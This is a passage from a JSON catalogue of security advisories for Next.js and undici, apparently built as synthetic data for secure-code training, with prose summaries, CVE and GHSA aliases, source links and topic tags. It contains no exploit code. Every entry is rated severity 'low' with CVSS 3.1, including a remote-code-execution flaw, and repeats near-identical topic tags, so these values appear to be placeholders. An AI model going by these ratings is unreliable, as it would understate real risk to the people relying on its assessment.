"https://github.com/vercel/next.js/issues/79346",
"https://github.com/vercel/next.js/pull/79939",
"https://github.com/vercel/next.js/commit/ec202eccf05820b60c6126d6411fe16766ecc066",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v15.3.3",
"https://vercel.com/changelog/cve-2025-49005"
],
"aliases": [
"CVE-2025-49005",
"GHSA-r2fc-ccr8-96c4"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-49826": {
"canonical_id": "nextjs--CVE-2025-49826",
"title": "Next.JS vulnerability can lead to DoS via cache poisoning ",
"summary": "### Summary\nA vulnerability affecting Next.js has been addressed. It impacted versions 15.0.4 through 15.1.8 and involved a cache poisoning bug leading to a Denial of Service (DoS) condition.\n\nUnder certain conditions, this issue may allow a HTTP 204 response to be cached for static pages, leading to the 204 response being served to all users attempting to access the page\n\nMore details: [CVE-2025-49826](https://vercel.com/changelog/cve-2025-49826)\n\n## Credits\n- Allam Rachid [zhero;](https://zhero-web-sec.github.io/research-and-things/)\n- Allam Yasser (inzo)",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-07-03T21:14:48Z",
"updated_at": "2025-07-03T21:49:52Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-67rr-84xm-4c7r",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-49826",
"https://github.com/vercel/next.js/commit/16bfce64ef2157f2c1dfedcfdb7771bc63103fd2",
"https://github.com/vercel/next.js/commit/a15b974ed707d63ad4da5b74c1441f5b7b120e93",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v15.1.8",
"https://vercel.com/changelog/cve-2025-49826"
],
"aliases": [
"CVE-2025-49826",
"GHSA-67rr-84xm-4c7r"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-55173": {
"canonical_id": "nextjs--CVE-2025-55173",
"title": "Next.js Content Injection Vulnerability for Image Optimization",
"summary": "A vulnerability in **Next.js Image Optimization** has been fixed in **v15.4.5** and **v14.2.31**. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery.\n\nAll users relying on `images.domains` or `images.remotePatterns` are encouraged to upgrade and verify that external image sources are strictly validated.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-55173)",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-08-29T21:59:55Z",
"updated_at": "2026-02-04T04:35:34.538107Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-55173",
"https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-55173",
"http://vercel.com/changelog/cve-2025-55173"
],
"aliases": [
"CVE-2025-55173",
"GHSA-xv57-4mr9-wg8v"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-57752": {
"canonical_id": "nextjs--CVE-2025-57752",
"title": "Next.js Affected by Cache Key Confusion for Image Optimization API Routes",
"summary": "A vulnerability in Next.js Image Optimization has been fixed in v15.4.5 and v14.2.31. When images returned from API routes vary based on request headers (such as `Cookie` or `Authorization`), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug.\n\nAll users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-57752)",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-08-29T22:06:22Z",
"updated_at": "2026-02-04T02:50:08.291668Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-57752",
"https://github.com/vercel/next.js/pull/82114",
"https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-57752"
],
"aliases": [
"CVE-2025-57752",
"GHSA-g5qg-72qw-gw5v"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-57822": {
"canonical_id": "nextjs--CVE-2025-57822",
"title": "Next.js Improper Middleware Redirect Handling Leads to SSRF",
"summary": "A vulnerability in **Next.js Middleware** has been fixed in **v14.2.32** and **v15.4.7**. The issue occurred when request headers were directly passed into `NextResponse.next()`. In self-hosted applications, this could allow Server-Side Request Forgery (SSRF) if certain sensitive headers from the incoming request were reflected back into the response.\n\nAll users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the `next()` function.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-57822)",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-08-29T21:33:09Z",
"updated_at": "2026-02-04T04:20:45.658010Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-57822",
"https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-57822"
],
"aliases": [
"CVE-2025-57822",
"GHSA-4342-x723-ch2f"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"ssrf-url-validation"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-59471": {
"canonical_id": "nextjs--CVE-2025-59471",
"title": "Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration",
"summary": "A DoS vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\n\nStrongly consider upgrading to 15.5.10 and 16.1.5 to reduce risk and prevent availability issues in Next applications.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-01-27T19:18:25Z",
"updated_at": "2026-02-10T01:28:46.973023Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-59471",
"https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c",
"https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v15.5.10",
"https://github.com/vercel/next.js/releases/tag/v16.1.5"
],
"aliases": [
"CVE-2025-59471",
"GHSA-9g9p-9gw9-jx7f"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--CVE-2025-59472": {
"canonical_id": "nextjs--CVE-2025-59472",
"title": "Next.js has Unbounded Memory Consumption via PPR Resume Endpoint ",
"summary": "A denial of service vulnerability exists in Next.js versions with Partial Prerendering (PPR) enabled when running in minimal mode. The PPR resume endpoint accepts unauthenticated POST requests with the `Next-Resume: 1` header and processes attacker-controlled postponed state data. Two closely related vulnerabilities allow an attacker to crash the server process through memory exhaustion:\n\n1. **Unbounded request body buffering**: The server buffers the entire POST request body into memory using `Buffer.concat()` without enforcing any size limit, allowing arbitrarily large payloads to exhaust available memory.\n\n2. **Unbounded decompression (zipbomb)**: The resume data cache is decompressed using `inflateSync()` without limiting the decompressed output size. A small compressed payload can expand to hundreds of megabytes or gigabytes, causing memory exhaustion.\n\nBoth attack vectors result in a fatal V8 out-of-memory error (`FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory`) causing the Node.js process to terminate. The zipbomb variant is particularly dangerous as it can bypass reverse proxy request size limits while still causing large memory allocation on the server.\n\nTo be affected, an application must run with `experimental.ppr: true` or `cacheComponents: true` configured along with the NEXT_PRIVATE_MINIMAL_MODE=1 environment variable.\n\nStrongly consider upgrading to 15.6.0-canary.61 or 16.1.5 to reduce risk and prevent availability issues in Next applications.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-01-28T15:20:55Z",
"updated_at": "2026-02-06T13:13:43.709252Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-5f7q-jpqc-wp7h",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-59472",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/summaries-of-cve-2025-59471-and-cve-2025-59472"
],
"aliases": [
"CVE-2025-59472",
"GHSA-5f7q-jpqc-wp7h"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--GHSA-5j59-xgg2-r9c4": {
"canonical_id": "nextjs--GHSA-5j59-xgg2-r9c4",
"title": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up",
"summary": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types. As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-12-12T17:21:57Z",
"updated_at": "2026-02-04T02:46:38.768104Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-67779",
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components",
"https://www.cve.org/CVERecord?id=CVE-2025-55184",
"https://www.facebook.com/security/advisories/cve-2025-67779"
],
"aliases": [
"GHSA-5j59-xgg2-r9c4"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--GHSA-9qr9-h5gf-34mp": {
"canonical_id": "nextjs--GHSA-9qr9-h5gf-34mp",
"title": "Next.js is vulnerable to RCE in React flight protocol",
"summary": "A vulnerability affects certain React packages<sup>1</sup> for versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55182](https://www.cve.org/CVERecord?id=CVE-2025-55182). \n\nFixed in:\nReact: 19.0.1, 19.1.2, 19.2.1\nNext.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7, 15.6.0-canary.58, 16.1.0-canary.12+\n\nThe vulnerability also affects experimental canary releases starting with 14.3.0-canary.77. Users on any of the 14.3 canary builds should either downgrade to a 14.x stable release or 14.3.0-canary.76.\n\nAll users of stable 15.x or 16.x Next.js versions should upgrade to a patched, stable version immediately.\n\n<sup>1</sup> The affected React packages are:\n- react-server-dom-parcel\n- react-server-dom-turbopack\n- react-server-dom-webpack",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-12-03T19:07:11Z",
"updated_at": "2026-02-04T03:45:15.823345Z",
"official_source_url": "https://github.com/facebook/react/security/advisories/GHSA-fv66-9v8q-g76r",
"secondary_source_urls": [
"https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp",
"https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-fmh4-wr37-44fp",
"https://nvd.nist.gov/vuln/detail/CVE-2025-55182",
"https://github.com/vercel/next.js"
],
"aliases": [
"GHSA-9qr9-h5gf-34mp"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--GHSA-h25m-26qc-wcjf": {
"canonical_id": "nextjs--GHSA-h25m-26qc-wcjf",
"title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components",
"summary": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-01-28T15:38:01Z",
"updated_at": "2026-02-13T00:43:52.836085Z",
"official_source_url": "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg",
"secondary_source_urls": [
"https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf",
"https://nvd.nist.gov/vuln/detail/CVE-2026-23864",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/summary-of-cve-2026-23864"
],
"aliases": [
"GHSA-h25m-26qc-wcjf"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy",
"deserialization-safety"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--GHSA-mwv6-3258-q52c": {
"canonical_id": "nextjs--GHSA-mwv6-3258-q52c",
"title": "Next Vulnerable to Denial of Service with Server Components",
"summary": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-12-11T22:49:27Z",
"updated_at": "2026-02-04T03:55:54.855562Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c",
"secondary_source_urls": [
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://www.cve.org/CVERecord?id=CVE-2025-55184"
],
"aliases": [
"GHSA-mwv6-3258-q52c"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"nextjs--GHSA-w37m-7fhw-fmv9": {
"canonical_id": "nextjs--GHSA-w37m-7fhw-fmv9",
"title": "Next Server Actions Source Code Exposure ",
"summary": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55183](https://www.cve.org/CVERecord?id=CVE-2025-55183).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that can return the compiled source code of [Server Functions](https://react.dev/reference/rsc/server-functions). This could reveal business logic, but would not expose secrets unless they were hardcoded directly into [Server Function](https://react.dev/reference/rsc/server-functions) code.",
"display_name": "Next.js",
"system_id": "nextjs",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-12-11T22:49:56Z",
"updated_at": "2026-02-04T02:51:40.627151Z",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-w37m-7fhw-fmv9",
"secondary_source_urls": [
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://www.cve.org/CVERecord?id=CVE-2025-55183"
],
"aliases": [
"GHSA-w37m-7fhw-fmv9"
],
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2022-31151": {
"canonical_id": "undici--CVE-2022-31151",
"title": "undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect",
"summary": "### Impact\n\nAuthorization headers are already cleared on cross-origin redirect in\nhttps://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872.\n\nHowever, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There also has been active discussion of implementing a cookie store https://github.com/nodejs/undici/pull/1441, which suggests that there are active users using cookie headers in undici.\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in v5.8.0.\n\n### Workarounds\n\nBy default, this vulnerability is not exploitable.\nDo not enable redirections, i.e. `maxRedirections: 0` (the default). \n\n### References\n\nhttps://hackerone.com/reports/1635514\nhttps://curl.se/docs/CVE-2018-1000007.html\nhttps://curl.se/docs/CVE-2022-27776.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n* To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2022-07-21T20:31:05Z",
"updated_at": "2026-02-04T03:02:08.652391Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-31151",
"https://github.com/nodejs/undici/issues/872",
"https://github.com/nodejs/undici/pull/1441",
"https://github.com/nodejs/undici/commit/0a5bee9465e627be36bac88edf7d9bbc9626126d",
"https://hackerone.com/reports/1635514",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189",
"https://github.com/nodejs/undici/releases/tag/v5.8.0",
"https://security.netapp.com/advisory/ntap-20220909-0006"
],
"aliases": [
"CVE-2022-31151",
"GHSA-q768-x9m6-m9qp"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2022-32210": {
"canonical_id": "undici--CVE-2022-32210",
"title": "ProxyAgent vulnerable to MITM",
"summary": "### Description\n\n`Undici.ProxyAgent` never verifies the remote server's certificate, and always exposes all request & response data to the proxy. This unexpectedly means that proxies can MitM all HTTPS traffic, and if the proxy's URL is HTTP then it also means that nominally HTTPS requests are actually sent via plain-text HTTP between Undici and the proxy server.\n\n### Impact\n\nThis affects all use of HTTPS via HTTP proxy using **`Undici.ProxyAgent`** with Undici or Node's global `fetch`. In this case, it removes all HTTPS security from all requests sent using Undici's `ProxyAgent`, allowing trivial MitM attacks by anybody on the network path between the client and the target server (local network users, your ISP, the proxy, the target server's ISP, etc).\nThis less seriously affects HTTPS via HTTPS proxies. When you send HTTPS via a proxy to a remote server, the proxy can freely view or modify all HTTPS traffic unexpectedly (but only the proxy). \n\n### Patches\n\nThis issue was patched in Undici v5.5.1.\n\n### Workarounds\n\nAt the time of writing, the only workaround is to not use `ProxyAgent` as a dispatcher for TLS Connections.",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2022-06-17T01:02:29Z",
"updated_at": "2026-03-13T22:15:23.541247Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-wx7w-2w33",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-32210",
"https://hackerone.com/reports/1583680",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2022-32210",
"GHSA-pgw7-wx7w-2w33"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2023-45143": {
"canonical_id": "undici--CVE-2023-45143",
"title": "Undici's cookie header not cleared on cross-origin redirect in fetch",
"summary": "### Impact\n\nUndici clears Authorization headers on cross-origin redirects, but does not clear `Cookie` headers. By design, `cookie` headers are [forbidden request headers](https://fetch.spec.whatwg.org/#forbidden-request-header), disallowing them to be set in `RequestInit.headers` in browser environments. Since Undici handles headers more liberally than the specification, there was a disconnect from the assumptions the spec made, and Undici's implementation of fetch.\n\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in [e041de359221ebeae04c469e8aff4145764e6d76](https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76), which is included in version 5.26.2.\n",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2023-10-16T14:05:37Z",
"updated_at": "2026-02-04T02:35:56.289390Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp",
"secondary_source_urls": [
"https://github.com/nodejs/undici/security/advisories/GHSA-wqq4-5wpv-mx2g",
"https://nvd.nist.gov/vuln/detail/CVE-2023-45143",
"https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76",
"https://hackerone.com/reports/2166948",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/releases/tag/v5.26.2",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"
],
"aliases": [
"CVE-2023-45143",
"GHSA-wqq4-5wpv-mx2g"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2024-30260": {
"canonical_id": "undici--CVE-2024-30260",
"title": "Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline",
"summary": "### Impact\n\nUndici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`.\n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75.\nFixes has been released in v5.28.4 and v6.11.1.\n\n### Workarounds\n\nuse `fetch()` or disable `maxRedirections`.\n\n### References\n\nLinzi Shang reported this.\n\n* https://hackerone.com/reports/2408074\n* https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-04-04T14:20:39Z",
"updated_at": "2025-11-04T19:44:28Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-30260",
"https://github.com/nodejs/undici/commit/64e3402da4e032e68de46acb52800c9a06aaea3f",
"https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75",
"https://hackerone.com/reports/2408074",
"https://github.com/nodejs/undici",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E",
"https://security.netapp.com/advisory/ntap-20240905-0008"
],
"aliases": [
"CVE-2024-30260",
"GHSA-m4v8-wqvr-p9f7"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2024-30261": {
"canonical_id": "undici--CVE-2024-30261",
"title": "Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect",
"summary": "### Impact\n\nIf an attacker can alter the `integrity` option passed to `fetch()`, they can let `fetch()` accept requests as valid even if they have been tampered.\n\n### Patches\n\nFixed in https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3.\nFixes has been released in v5.28.4 and v6.11.1.\n\n\n### Workarounds\n\nEnsure that `integrity` cannot be tampered with.\n\n### References\n\nhttps://hackerone.com/reports/2377760",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-04-04T14:20:54Z",
"updated_at": "2025-11-04T19:44:42Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-qj54-h672",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-30261",
"https://github.com/nodejs/undici/commit/2b39440bd9ded841c93dd72138f3b1763ae26055",
"https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3",
"https://hackerone.com/reports/2377760",
"https://github.com/nodejs/undici",
